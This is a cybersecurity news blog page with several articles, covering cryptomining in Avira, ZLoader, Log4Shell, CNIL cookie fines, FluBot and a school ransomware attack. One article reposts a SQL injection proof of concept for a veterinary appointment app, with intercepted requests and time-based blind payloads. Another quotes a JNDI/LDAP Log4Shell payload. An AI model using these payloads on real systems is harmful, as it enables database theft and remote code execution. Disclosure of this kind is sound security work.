Friday, January 17, 2025
Home Blog Page 61

500M Avira Antivirus Users Introduced to Cryptomining

By
Steven Black (n0tst3)
-
1
avira
avira

Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for its Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program that lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavour: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.

avira av crypto
avira av

In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt into using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15% of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.
Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.

source

Why not read Online scams against the elderly to watch out for in 2022?

Bookmark
Please login to bookmarkClose

A 9-Year-old Microsoft Flaw is Still Being Exploited By Hackers in 2022

By
RiSec.General
-
0
microsoft

A ZLoader campaign that began in November has infected almost 2,200 victims in 111 countries by abusing a Windows flaw that Microsoft fixed back in 2013.

Hackers have long used a variety of tactics to sneak Zloader past malware detection tools. In this case, according to researchers at security firm Check Point, the attackers took advantage of a gap in Microsoft’s signature verification, the integrity check for ensuring that a file is legitimate and trustworthy.

First, they’d trick victims into installing a legitimate remote IT management tool called Atera to gain access and device control; that part’s not particularly surprising or novel.

From there, though, the hackers still needed to install ZLoader without Windows Defender or another malware scanner detecting or blocking it. 

The Near Decade Old Flaw Being Exploited by Hackers

This is where the nearly decade-old flaw came in handy. Attackers could modify a legitimate “Dynamic-link library” file—a common file shared between multiple pieces of software to load code—to plant their malware.

The target DLL file is digitally signed by Microsoft, which proves its authenticity. But attackers were able to inconspicuously append a malicious script to the file without impacting Microsoft’s stamp of approval.

“When you see a file like a DLL that’s signed you’re pretty sure that you can trust it, but this shows that’s not always the case,” says Kobi Eisenkraft, a malware researcher at Check Point. “I think we will see more of this method of attack.”

Microsoft calls its code-signing process “Authenticode.” It released a fix in 2013 that made Authenticode’s signature verification stricter, to flag files that had been subtly manipulated in this way. Originally the patch was going to be pushed to all Windows users, but in July 2014 Microsoft revised its plan, making the update optional.

“As we worked with customers to adapt to this change, we determined that the impact to an existing software could be high,” the company wrote in 2014, meaning that the fix was causing false positives where legitimate files were flagged as potentially malicious. “Therefore, Microsoft no longer plans to enforce the stricter verification behaviour as a default requirement.

The underlying functionality for stricter verification remains in place, however, and can be enabled at customer discretion.”

malware
malware

In a statement on Wednesday, Microsoft emphasized that users can protect themselves with the fix the company released in 2013. And the company noted that, as the Check Point researchers observed in the ZLoader campaign, the vulnerability can only be exploited if a device has already been compromised or attackers directly trick victims into running one of the manipulated files that appears to be signed. “Customers who apply the update and enable the configuration indicated in the security advisory will be protected,” a Microsoft spokesperson told WIRED.

But while the fix is out there, and has been for all this time, many Windows devices likely don’t have it enabled, since users and system administrators would need to know about the patch and then choose to set it up. Microsoft noted in 2013 that the vulnerability was being actively exploited by hackers in “targeted attacks.”

“We have a fix, but nobody uses it,” Eisenkraft says. “As a result, a lot of malware would be able to get into companies and personal computers using this method.”

The recent ZLoader attacks primarily targeted victims in the United States, Canada, and India. Other recent ZLoader attacks from an array of actors have used malicious word processing documents, tainted websites, and malicious ads to distribute the malware.

The Check Point researchers believe that this latest campaign was perpetrated by the prolific criminal hackers known as MalSmoke, because the group has a history of using similar techniques and the researchers saw some infrastructure links between this campaign and past MalSmoke hacking. MalSmoke has often had a particular focus on malvertising, particularly hijacking ads on sites and services that distribute porn and other adult content. The group has used ZLoader in past campaigns as well as other malware including the popular malicious downloader called “Smoke Loader.”

It’s not unheard of for vulnerabilities to persist in software for many years, but when those flaws are discovered their longevity typically means that they’re lurking in a large number of devices. It’s also not unusual for some gadgets, particularly internet of things devices, to go unpatched even when a fix for a particular vulnerability is available. But this campaign represents a difficult scenario to defend against: a vulnerability with a fix so obscure that few would even know to apply it.

Read more cybersecurity articles

Bookmark
Please login to bookmarkClose

Warning: Log4j Still Lurks Where Dependency Analysis Can’t Find It

By
Steven Black (n0tst3)
-
0
java
java

Research shows Log4J still lurks where dependency analysis can’t find it

The best programming practice to include a third-party library in source code is to use the import command. It is the easiest way to do it, and it is also the way that most dependency analysis programs work to determine if a vulnerable library is in play.

Any time code is included without calling it as an external package, traditional dependency analysis might not be enough to find it — including when Java coders use a common trick to resolve conflicting dependencies during the design process.

log4shell
log4shell

Log4J Warning

A new study by jFrog found that 400 packages on repository Maven Central used Log4j code without calling it an external package. Around a third of that came from fat jars — jar files that include all external dependencies to make a more efficient product. The remainder came from directly inserting Log4j code into the source code, including shading, a work-around used when two or more dependencies call different versions of the same library in a way that might conflict.

While 400 may not seem like a lot for Maven Central, where Google found 17,000 packages implementing the vulnerable Log4j library, some of the 400 packages unearthed by JFrog are widely used.

Log4Shell
Apache Log4J

“Some of the packages, we were familiar with. Some are commercially backed, some are maintained by the community. Some were pretty significant,” said Asaf Karas, chief technology officer of JFrog Security Research.

JFrog scanned Maven Central using an in-depth open-source scanner it released on December 28. Karas suggests enterprises apply to their own java applications. Maven Central’s packages may be indicative of how corporations coded their own internal and product software.

While the 400 packages contain unlisted Log4j, around 70% of the time, they did contain dependencies using Log4j that might light up a scanner (albeit pointing in a different direction).

JFrog has not yet released the names of the potentially vulnerable packages it discovered on Maven Central while it completes disclosure.

“It’s a process where we’re trying to really understand which are the ones that are the most popular and then disclose that information there first,” said Karas

“But we didn’t want to postpone the fact that people should be aware that this kind of threat exists.”

Read more cybersecurity news articles

Bookmark
Please login to bookmarkClose

France Fines Google and Facebook €210m Over Misuse of Data

By
Steven Black (n0tst3)
-
0
France fines Google and Facebook
France fines Google and Facebook

France’s Data privacy watchdog says websites make it difficult for users to refuse cookies

France’s data privacy watchdog has fined Google and Facebook a combined €210m (£176m) for hampering users’ ability to stop the companies tracking their online activity.

The Commission Nationale de l’Informatique et des Libertés (CNIL) said on Thursday it had fined Google a record €150m for making it difficult for internet users to refuse cookies – small text files that build up a profile of a person’s web activity for commercial purposes. It fined Facebook €60m for the same reason.

Internet users’ prior consent for the use of cookies is a key pillar of the EU’s data privacy regulation, and a top priority for the CNIL.

“When you accept cookies, it’s done in just one click,” said Karin Kiefer, CNIL’s head of data protection and sanctions. “Rejecting cookies should be as easy as accepting them.”

4000
Google Facebook

The watchdog said the facebook.com, google.fr and youtube.com websites did not allow the easy refusal of cookies. Citing the example of Facebook, it said: “Several clicks are required to refuse all cookies, as opposed to a single one to accept them.”

It said the companies had three months to comply with its orders, including making it easier for French users to decline cookies, or face extra penalty payments of €100,000 for every day of delay.

A Google spokesperson said: “People trust us to respect their right to privacy and keep them safe. We understand our responsibility to protect that trust and are committing to further changes and active work with the CNIL in light of this decision.”

A spokesperson for Facebook’s parent company, Meta, said: “​​We are reviewing the authority’s decision and remain committed to working with relevant authorities. Our cookie consent controls provide people with greater control over their data, including a new settings menu on Facebook and Instagram where people can revisit and manage their decisions at any time, and we continue to develop and improve these controls.”

In 2020, the CNIL strengthened consent rights over ad trackers, saying websites operating in France should keep a register of internet users’ refusal to accept cookies for at least six months.

It also said internet users should be able to easily reconsider any initial agreement concerning cookies via a weblink or an icon that should be visible on all pages of a website.]

source

Bookmark
Please login to bookmarkClose

COVID Test Data Breach at UK School

By
Steven Black (n0tst3)
-
1
The De Montfort School
The De Montfort School

A mix-up at a school in Worcestershire, England, caused parents to receive the COVID-19 test results of other people’s children.

The data breach, reported today by the Evesham Journal, occurred at co-educational secondary school and sixth-form college The De Montfort School (TDMS) in Evesham, which is part of the Four Stones Multi Academy Trust.

After the holiday season, students returning to learning underwent asymptomatic testing for the coronavirus at TDMS on Tuesday. In a security incident ascribed to “human error,” some students’ test results were sent to the wrong guardians.

Ninth-grade student Amelia Felton was among the children affected by the data breach. Felton’s mother, Becky, learned of the security breach not through the school but via the parent of another student.

“I’m not very happy,” Becky Felton told the Evesham Journal. “It was another parent that told me she had received my daughter’s result. This is a serious breach of personal data.”

The headteacher at The De Montfort School, Ruth Allen, confirmed that the data breach had taken place while the test results were being uploaded to the school’s network. 

Allen said the incident had involved the personal data of only a small number of students. The school’s coronavirus testing process had been successful due to the cooperation of students and teaching staff.

“In line with government guidance, on Tuesday, January 4, the school facilitated asymptomatic testing for our students following the Christmas break,” said Allen.

“Testing for students was completed quickly and without fuss thanks to our excellent team of testers and the good will of our students, who now have testing down to a fine art. This meant that all students were back in face-to-face lessons on Wednesday.”

She added: “Unfortunately, whilst uploading results, a data breach occurred that affected a small number of students.”

Allen said that the data breach has been investigated according to the regulations laid out in the Four Stones Multi Academy Trust data protection policy and that the security incident was reported to the Information Commissioner’s Office. 

The TDMS head added that the data breach was “found to be the result of a human error.”

Continue reading Cybersecurity News articles here

Bookmark
Please login to bookmarkClose

Online Veterinary Appointment System 1.0 – ‘Multiple’ SQL Injection

By
Steven Black (n0tst3)
-
0
EXPLOIT
EXPLOIT
# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

# Exploit Author: twseptian
# Vendor Homepage: https://www.sourc ecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
# Software Link: https://www.sourc ecodester.com/sites/default/files/download/oretnom23/ovas.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

=====================================================================================================================================
SQL Injection:
=====================================================================================================================================
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.

=====================================================================================================================================
Attack Vector:
=====================================================================================================================================
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

=====================================================================================================================================
1. Appointment Requests - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:

http://localhost/ovas/admin/?page=appointments

then go to 'Action' > 'View'.

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
2. Inquiries - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:

http://localhost/ovas/admin/?page=inquiries

then go to 'Action' > 'View'.

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=inquiries
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'My Account' page using the following URL:

http://localhost/ovas/admin/?page=user

Step-2: then let's intercept 'Update' request using burpsuite: 

POST /ovas/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
Content-Length: 796
Origin: http://localhost
Connection: close
Referer: http://localhost/ovas/admin/?page=user
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="id"

4
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
for example, the time-based blind payload in 'id':  

[SNIP]
Content-Disposition: form-data; name="id"

4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters

=====================================================================================================================================
4. Category List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Category List ' page using the following URL:

http://localhost/ovas/admin/?page=categories

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=categories
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
5. Service List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Service List ' page using the following URL:

http://localhost/ovas/admin/?page=services

then go to 'Action' > 'View' 

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=services
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
6. Admin User List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:

http://localhost/ovas/admin/?page=user/list

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/ovas/admin/?page=user/list
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

You may also enjoy reading, ElementVape: Major e-cigarette store hacked to steal credit cards

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

FluBot malware now targets Europe posing as Flash Player app

By
Steven Black (n0tst3)
-
0
flubot malware
flubot malware

The widely distributed FluBot malware continues to evolve, with new campaigns distributing the malware as Flash Player and the developers adding new features.

FluBot is an Android banking trojan that steals credentials by displaying overlay login forms against many banks worldwide.

The smishing (SMS phishing) lures for its distribution include fake security updatesfake Adobe Flash Playersvoicemail memos, and impersonating parcel delivery notices.

Once in the device, FluBot can steal online banking credentials, send or intercept SMS messages (and one-time passwords), and capture screenshots.

Because the malware uses the victim’s device to send new smishing messages to all their contacts, it usually spreads like wildfire.

flubot spread diagram
FluBot spread process diagram
Source: F5 Labs

Impersonating Flash Player

MalwareHunterTeam told BleepingComputer that new FluBot campaigns are distributed using SMS texts asking the recipient if they intended to upload a video from their device.

An example of this campaign’s SMS text targeting Polish recipients was shared by CSIRT KNF, as seen below.

flubot sms
FluBot SMS text asking if the user uploaded a video
Source: CSIRT KNF

When recipients click on the included link, they are brought to a page offering a fake Flash Player APK [VirusTotal] that installs the FluBot malware on the Android device.

flubot attack chain
FluBot fake Flash Player attack chain
Source: CSIRT KNF

Android users should always avoid installing apps from APKs hosted at remote sites to protect themselves from malware. This practice is especially true for well-known brands, like Adobe, whose apps should only be installed from trusted locations.

New features observed in recent FluBot versions

The most recent major release is version 5.0, which came out in early December 2021, while version 5.2 saw the light only a few days ago.

With this release, the DGA (domain generation algorithm) system received much attention from the malware authors, as it’s vital in enabling the actors to operate unobstructed.

DGA generates many new C2 domains on the fly, making mitigation measures such as DNS blocklists ineffective.

In its newest version, FluBot’s DGA uses 30 top-level domains instead of just three used previously and also features a command that enables attackers to change the seed remotely.

flubot
The function responsible for domain generation
Source: F5 Labs

On the communication side, the new FluBot now connects to the C2 through DNS tunnelling over HTTPS, whereas previously, it used direct HTTPS port 443.

The commands added on the malware in versions 5.0, 5.1, and 5.2, are the following:

  • Update DNS resolvers
  • Update the DGA seed remotely
  • Send longer SMS messages using multi-part division functions

Along with the above, the latest version of FluBot retains the capability to:

  • Open URLs on demand
  • Get the victim’s contact list
  • Uninstall existing apps
  • Disable Android Battery Optimization
  • Abuse Android Accessibility Service for screen grabbing and keylogging
  • Perform calls on demand
  • Disable Play Protect
  • Intercept and hide new SMS messages for stealing OTPs
  • Upload SMS with victim information to C2
  • Get list of apps to load the corresponding overlay injects

In summary, FluBot hasn’t deprecated any commands used in previous versions and only enriched its capabilities with new ones.

For more technical details on how exactly the latest version of FluBot works, check out the F5 Labs report.

Android Flubot Malware 2
Android Flubot Malware

How to stay safe from FluBot

Note that in many cases, a link to download FluBot will arrive on your device via one of your contacts, maybe even a friend or family.

As such, if you receive an unusual SMS that contains a URL and urges you to click it, it’s likely a message generated by FluBot.

Finally, avoid installing APK files from unusual sources, regularly check that Google Play Protect is enabled on your Android device, and use a mobile security solution from a reputable vendor.

Bookmark
Please login to bookmarkClose

UK: NHS Warns of Hackers Exploiting Log4Shell

By
Steven Black (n0tst3)
-
1
nhs log4shell
nhs log4shell

The UK’s National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.

Log4Shell is an exploit for CVE-2021-44228, a critical arbitrary remote code execution flaw in the Apache Log4j 2.14, which has been under active and high-volume exploitation since December 2021.

Apache addressed the above and four more vulnerabilities via subsequent security updates, and Log4j version 2.17.1 is now considered adequately secure.

Hackers Targeting Apache Tomcat in VMware Horizon with Log4Shell

According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure.

This comes just two days after we were able to report that Microsoft issued a very similar warning, in that log4j attacks remain rampant into 2022. See here

log4shell nhs
log4shell

“The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory InterfaceTM (JNDI) via Log4Shell payloads to call back to malicious infrastructure,” explains the alert.

“Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.”

“The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.”

The actor is taking advantage of the presence of the Apache Tomcat service embedded within VMware Horizon, which is vulnerable to Log4Shell.

The exploitation begins with the simple and widely used “${jndi:ldap://example.com}” payload and spawns the following PowerShell command from Tomcat.

PowerShell command log4shell
PowerShell command spawned by Tomcat
Source: NHS

This command invokes a win32 service to get a list of ‘VMBlastSG’ service names, retrieve paths, modify ‘absg-worker.js’ to drop a listener, and then restart the service to activate the implant.

The listener is then responsible for executing arbitrary commands received via HTTP/HTTPS as header objects with a hardcoded string.

At this point, the actor has established persistent and stable communication with the C2 server and can perform data exfiltration, command execution, or deploy ransomware.

Attack flow diagram Source: NHS
Attack flow diagram
Source: NHS

VMware Horizon is not the only VMware product targeted by threat actors using the Log4j vulnerability.

The Conti ransomware operation is also using Log4Shell to spread laterally to vulnerable VMware vCenter servers to more easily encrypt virtual machines.

Security updates are available

VMware released a security update for Horizon and other products last month, fixing CVE-2021-44228 and CVE-2021-45046 with versions 2111, 7.13.1, and 7.10.3

As such, all VMware Horizon admins are urged to apply the security updates as soon as possible.

NHS’s report also highlights the following three signs of active exploitation on vulnerable systems:

  1. Evidence of ws_TomcatService.exe spawning abnormal processes
  2. Any powershell.exe processes containing ‘VMBlastSG’ in the command line
  3. File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ – This file is generally overwritten during upgrades and not modified

Is log4shell the worst security vulnerability of the decade?

Bookmark
Please login to bookmarkClose

Ransomware Attack Shuts Down Thousands Of School Websites

By
Steven Black (n0tst3)
-
1
data breach

FinalSite Disrupted by Ransomware – Attack Shuts Down Thousands of School Websites

FinalSite, a leading school website services provider, has suffered a ransomware attack disrupting access to websites for thousands of schools worldwide.

FinalSite is a software as a service (SaaS) provider that offers website design, hosting, and content management solutions for K-12 school districts and universities. FinalSite claims to provide solutions for over 8,000 schools and universities across 115 different countries.

On Tuesday, school districts that hosted their websites with FinalSite found that they were no longer reachable or were displaying errors.

At the time, FinalSite did not disclose that they had suffered an attack but simply said that they were experiencing error and “performance issues” across various services, affecting mostly their Composer content management system. 

“This impact may include, but is not limited to, Groups Manager, Constituent Manager, Login, Forms Manager (old), Registration Manager, Directory Elements, Athletics Manager, Calendar Manager,” reads the FinalSite status page.

A school IT administrator told BleepingComputer that FinalSite did not provide them with a time frame as to when services would be restored and were forced to send emails to parents alerting them of the outage.

“Our website is currently down due to an issue that our service provider is experiencing. We apologize for any inconvenience this may cause you,” read an example outage email shared with BleepingComputer.

In addition to the website outages, a system administrator shared on Reddit that the attack prevented schools from sending closure notifications due to weather or COVID-19.

“Many districts are complaining that they are unable to use their emergency notification system to warn their communities about closures due to weather or COVID-19 protocol,” explained the Reddit post.

Outages caused by a ransomware attack

After three days of disruption, FinalSite confirmed today that a ransomware attack on their network is causing the outages.

“We are incredibly sorry for this prolonged outage and fully realize the stress it is causing your organizations. While we have made progress overnight to get all websites up and running, full restoration has taken us longer than anticipated,” FinalSite apologized in a status update today.

“The Finalsite security team monitors our network systems 24 hours a day, seven days a week. On Tuesday, January 4, our team identified the presence of ransomware on certain systems in our environment.”
